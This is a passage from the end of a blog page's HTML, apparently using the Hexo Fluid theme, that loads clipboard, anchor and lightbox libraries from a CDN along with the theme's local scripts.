        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>




  
<script src="/js/backgroundize.js"></script>
<script src="/js/snow.js"></script>
<script src="/js/scrollAnimation.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
